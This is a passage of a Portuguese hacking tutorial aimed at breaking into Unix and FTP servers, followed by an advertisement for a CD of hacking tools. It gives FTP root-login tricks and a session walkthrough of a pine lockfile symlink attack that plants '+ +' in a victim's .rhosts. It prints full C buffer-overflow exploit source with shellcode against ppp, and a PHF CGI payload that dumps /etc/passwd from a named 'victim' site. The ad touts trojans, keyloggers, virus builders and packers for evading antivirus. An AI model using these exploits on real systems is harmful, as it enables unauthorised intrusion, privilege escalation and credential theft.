O senha do root aparece com um asterisco por causa do shadow mas o shadow esta “r” para
você. Normalmente /etc/shadow está escondido como /etc/.shadow
Diretórios que começam com ponto “.” São diretórios ocultos.
Se o .shadow não estiver na diretório etc, você precisa procurar e o arquivo passwd pode estar
com outro nome.
/etc/shadow
podem conter senhas como vimos anteriormente
/etc/group
Aqui fica guardado quem pertence a cada grupo e as senhas do grupo.
/usr/adm/loginlog
Aqui ficam os Logs, horários de entradas e saídas dos usuários.
As vazes podem estar em /usr/adm/acct/loginlog
E as vezes nem é encontrado, alguns servidores desativam este serviço.
/usr/mail/<nomedousuario> :
Aqui fica o MAIL do usuário, para você ler esse arquivo você tem de
ser o root ou o próprio usuário.
/upload ou /cache
Aqui ficam gravados arquivos temporários que os usuários ou mesmo o
ROOT ia utilizar dentro do server, mas eles sao apagados a cada 24 horas ou
a cada semana. Em muitos servers nao existe esse diretório.
/bin :
Neste diretório ficam os comandos do server e as shells. Cuidado.
SENHAS E EXPLOITS
Login anônimo
user: anonymous
pass: eu@dominio
Logar como root (somente em servidores com falha)
quote user ftp
quote cwd ~root
quote pass ftp
quote user ftp
quote cwd ~sys
quote pass ftp
quote user ftp
quote cwd ~sysop
quote pass ftp
Diretorio das senhas :
(As senhas estarão criptografadas)
/etc/passwd
.shadow (procure este diretório oculto)
Decriptografando uma senha
Exemplo de senha criptografada:
root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Para decriptografarmos precisaremos de um decripter, pesquisem sobre decrypter passwd ftp
Quebrando uma senha de FTP
Quando você não pode acessar o arquivo passwd.txt e não consegue a senha criptogafada,
significa que a segurança do servidor é muito boa ou você é muito ruim =)
Ai só usando os métodos Lamer um deles é o Brute Force.
Brute force significa “força bruta” existem vários programas de brute force, o funcionamento é
simples, o programa gera inúmeras combinações de senhas até achar uma que logue. Você
também pode usar uma “Word list” (uma lista com as senhas mais comuns) junto com o Bute
Force. Um exemplo de programa é o Brutus
Exploits UNIX
Exploiter sem duvida é a melhor forma de hackear um servidor, mas é muito mais complicado, é
impossível você entender um exploiter se você não souber programar.
Um exploit é um programa que você cria e faz ele rodar dentro do servidor exploranda falhas e te
levando á root.
Eu achei um ótimo exemplo de exploit que roda via telnet, é o PINE EXPLOIT
Vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode
fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela
de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox.
Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para
~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as
identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" >
/tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep
pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05
.302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep
pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00
grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse é o ultimo que vou relacionar aqui.
Exploitation script para vunerabilidade ppp.
#include #include #include
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i); ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i];
addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr; *ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL); } Agora voce tem o root.
Dicas de exploits em UNIX
Estes são exploits usando comandos básicos de Unix, eu nem chamaria de exploits mas é legal
para começar a estudar.
Procurar por arquivos ocultos
find / -name ".. " -print -xdev
find / -name ".*" -print -xdev |cat -v
Procurar por todos os diretórios com permissão de gravar (R)
find / -perm -0777 -type -d -ls
Procurando arquivos setuid no filesystem
Os arquivos setuid habilitados pode ser usado para tentar ganhar privilegio do root
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -4000
find / -type f -perm -4000 -exec ls -l {} \;
Procurar por todos os arquivos setgid no filesystem.
find / -group root -perm -2000 -exec ls -ldb {} \;
BUG de PHF
Este exploit é muito antigo, muito dificio achar um servidor desatualizado.
Basta colocar o exploit no seu navegador.Exploit:
/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
ele mostrará o diretório das senhas, você coloca o exploit na frende da URL do site, exemplo:
http://www.sitevitima.com /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
Principais Falhas de FTP
- Não existe criptografia nos dados transmitidos, textos puros, senhas podem ser capturadas
faciomente com um sniffer.
- Existem servidores que deixam arquivos.ini expostos de contendo senhas de FTP, e o google
consegue localizar estes arquivos, por exemplo:
Digite filetype:ini ws_ftp pwd no google, você vai ver a quantidade de arquivos expostos.
- Tem gente que ainda deixa root sem senha
- Como os navegadores interagem com FTP, link de download direto, você pode invadir um
FTP e “linkar” os arquivos para download, tipo:
ftp://dominio/diretorios/arquivo
Login anônimo, deixa você navegar pelo servidor e visualizar dados que podem te elevar a root
Como vocês pedem notar isto é o básico. Não parem de estudar, e principalmente compartilhar
informação.
Se quiserem entrar em contato comigo para tirar alguma dúvida:
Email:
[email protected]
MSN
[email protected]
Praga de Orkut:
http://www.orkut.com/Profile.aspx?uid=4380671928865807152
CD ROOM HACKING TOOLS
O Hacking Tools é um CD de softwares voltado para quem gosta de Hacking em informática.
Não é apenas mais um CD de programas de invasão, nele vc encontra suporte para Redes, Programação,
Comunicação de dados, TCP/IP, Scans, Exploiters, etc..Também tem os trojans e keyllogers .Resumindo todos os
tipos de programas que vc precisa para se tornar um hacker de verdade, e não apenas mais um Lamer que sabe rouba
senha com KL e invadir por cookies =)
No CD tem uma descrição de cada tipo de programa, e cada programa vem com um "readme" sobre o seu
funcionamento.
Para comprar o CD entre no site:
www.cdhackingtools.com
Conteudo do CD:
Redes/Internet
-Emita Pacotes UDP (com opção de tamanho de Buffer) para qualquer porta
-Programas para conexão remota ( com suporte para diferentes roteadores )
-Faça uma lista de todas as portas TCP e UDP abertas em seu computador.
-Capture pacotes de IP contendo protocolos http em sua rede
-Procure por pastas compartilhadas
-Desligue um computador de rede local ou através da Internet.
-Altere o seu endereço MAC
-Capture informações de sua rede, conexões são estabelecidas, chats, etc. e monitore tudo á distancia via email.
-Verifique o status de qualquer servidor na internet
-Faça do seu computador um servidor de internet.
-Capture todas as informações do tráfego de sua rede/conexão.
-Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e também senhas protegidas por asteriscos (útil para senhas de
wireless).
-Deixe qualquer porta de seu computador em escuta e crie um log de texto.
-Faça DNS Spoofing ( redirecione qualquer endereço de site para o site que você quiser)
-Mapeie qualquer porta de seu pc para outra maquina
-Monitore qualquer servidor http, smtp, pop3
-Envie emails diretamente para seu pc, faça um diagnostico qualquer servidor smtp
-Editor de cookies
-E muito mais... são vários programas de snifers, scans, telnet, etc.
Exploiters/Scans
Um exploit, é um programa com uma porção de dados ou uma sequência de comandos que se aproveita das
vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos
(ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a
fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas.
Trojans Backdoors
Um meio secreto ou não documentado de invadir um sistema de computador .
Trojan backdoor é um programa que age como a lenda do cavalo de tróia. entrando no computador , e liberando uma
porta para um possível invasor.
Os trojans atuais são divididos em duas partes: o servidor e o cliente Normalmente, o servidor está oculto em algum outro
arquivo e, no momento que esse arquivo é executado, o servidor se instala e se oculta no computador da vítima; a partir
deste momento, o computador pode ser acessado pelo cliente, que irá enviar informações para o servidor executar certas
operações no computador da vítima.
Resumindo :
Servidor é o vírus trojan que vai se instalar no pc da vítima
Cliente é o programa que esta no seu pc
E vc precisa de um endereço para conectar o servidor ao cliente ,este endereço é o IP
Keyloggers
Keylogger (que significa registrador do teclado em inglês) é um programa de computador cuja finalidade é monitorar tudo
o que é digitado.Instalado no computador sem o conhecimento da vítima o keylogger captura dados sensíveis e os envia a
um cracker.Neste CD existe Keyloggers que são programáveis para enviar os logs para o email de uma pessoa.
Bruteforces
(Força Bruta): técnica de intrusão de sistemas que se baseia em tentativa e erro. São geradas palavras e a combinação
destas com em nomes de usuários e senhas é tentada exaustivamente até que um usuário válido seja
encontrado.Ferramentas para força bruta em:
- HTTP Basic Auth
- HTTP Form
- FTP
- POP3
- TELNET
- SMB (Netbios)
- Custom
IP Scans
Procure portas abertas e falhas de seguranças de um determinado IP ou uma faixa de IP específica.
Obtenha resolução de host names, checagem de portas abertas, varredura de máquinas mortas, varreduras de múltiplas
portas. Faça scans até de IP que não respondem ao ping.
Procure trojans instalados em uma determinada faixa de IP.
Nuckers
Nuke é o nome atribuído a programas que finalizam
prematuramente com uma conexão TCP através do envio
de pacotes ICMP com mensagens de erro. Tais pacotes
podem ser direcionadas para o servidor (server side nuke)
ou para o cliente (client side nuke).
Tais programas tem a propriedade de terminar com a
conexão fazendo com que o cliente ou o servidor sejam
enganados por uma mensagem de erro que normalmente
indicaria um problema de conexão entre os dois.
Binders
Ferramenta que combina dois ou mais arquivos em um só, geralmente, com o fim de ocultar um deles. Um binder compila
a lista selecionada em um arquivo host, que poderá ser renomeado. Arquivo host é um programa simples compilado e
personalizado que irá descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados são
automaticamente descompactados e executados. Quando um cavalo de Tróia está vinculado ao Notepad, por exemplo, a
sua aparência e execução irão se assemelhar ao Notepad, mas o cavalo de Tróia também será executado
Criptografia
Programas de codificação e Decodificação de dados.
Criptografia de arquivos em pastas, web ,dados,scripts etc.
Programaçao
O CD contem varias ferramentas de programação.
Editores de HTML, PHP , Javascript, binary, hexadecimal.
Ambiente de Programação em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL
Tradutor de Algoritmos. Programas para vc desenvolver o seu software.
Gerador de programa de instalação etc.
Compiladores
Compiladores são programas que permitem transformar códigos escrito na linguagem de programação usada em
linguagem de máquina, gerando o binário que pode ser executado.
No CD contem compiladores de C C++ Assesmbler Perl
Resource
Modifique, extraia e insira Resources em executáveis, você pode mudar totalmente um programa de 32 bits .Você pode
mudar caixas de diálogo, ícones e outras coisas.
Conversores
Corverta vários formatos de arquivo.
De bat para exe, html para exe, pps para exe, vbs para exe, áudio e vídeo para exe, swf para exe, decompilador de flash,
conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.).
Compressores
Compressores são programas que executa partes do código ao mesmo nivel de prioridade que o sistema operacional
permite supervisar e controlar as aplicações executadas. Excelente para que você esconda seus virus de modo que o
antivirus não detecte.
Compactadores
São programas que usam certas técnicas para criar um arquivo, que contém vários arquivos e/ou pastas compactados.No
cd contem os programas Winrar, Winzip e UPX
Ferramentas web
Ferramentas para você usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc .
Ferramentas windows
Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco,
manutenção do sistema, proteção de arquivos, etc.
Vírus
Um vírus de computador nada mais é do que um programa que fica “residente” na memória do microcomputador , e de
acordo com determinados parâmetros executa uma ação (normalmente danosa)o cd contem mais de 1000 virus, Virus
Builders, arquivos de batch.
Msn/orkut
São mais de 70 programas para msn .
Sniffers para capturar conversas de msn na sua rede
Coloque o vídeo que vc quiser na imagem da sua webcan.
Envie qualquer arquivo que o msn bloqueia.
Programas de flood.
Faça um log de todas as musicas que seu amigo ouviu.
"Roube" as imagens de exibição, emotions, etc. dos seus contatos.
Pegue o IP de seu amigo.
Envie uma mensagem automática quando seu amigo fechar sua janela.
Traduza suas mensagens na janela de contato apertando a tecla F5, Transforme tudo o que você digitar em link de
pesquisa
E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery.
Mais clientes de msn alem do windows messenger.
Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery)
Programas para orkut e mirc.
Servidores
Servidor é um sistema de computação que fornece serviços a uma rede de computadores tanto rede local como à internet.
O cd contem servidore de: Email, HTTP, FTP, DNS, PHP,
SSH e PERL.
Hospede seu site em seu próprio computador.
Clientes
Programas que acessam os serviços de um servidor. Telnet, SSH
Segurança
Programas para ajudar na sua segurança, não um kit de anti vírus.
Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares,
Monitore a segurança de seu computador à distancia.
Crie um emulador de terminal Telnet e SSH.
Ferramentas gerais
Recupere senhas, Altere ícones, resete senha do usuário, crie seus próprios auto executáveis, monitor de webcan,
gerenciador de uploads
Mais
Navegadoes: Firefox,Netscape,Opera e Safari
Rode o Linux dentro do windows
Sistemas operacionais
Programas que rodam do pen drive
Códigos fontes do:
Secure Internet Communication Suíte.
Crack Whore 2.2 (Fonte do programa feito para testar a segurança dos sites.)
GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac.
EQUIPE HALL OF HACKERS
A Hall of Hackers foi criada em dezembro de 2006.
Nosso intuito NÃO é promover nenhum tipo de prática maliciosa.
O “conhecimento hacker” infelizmente ainda é muito restrito e visto com preconceito, nós da Hall
of Hackers somos inteiramente a favor da liberdade de informação.
Hacker não é quem fica praticando crimes virtuais. Hacker desenvolve sistemas, programas, ou
seja, quem realmente estuda.
Nossa comunidade
http://www.orkut.com/Community.aspx?cmm=22006772
NOSSOS PROGETOS:
Orkut Community
Hall of Hackers
CD Room de Softwares
Scan On Line
Blog Hacking
www.cdhackingtools.com
www.webexploiter.com
http://insecuritynet.blogspot.com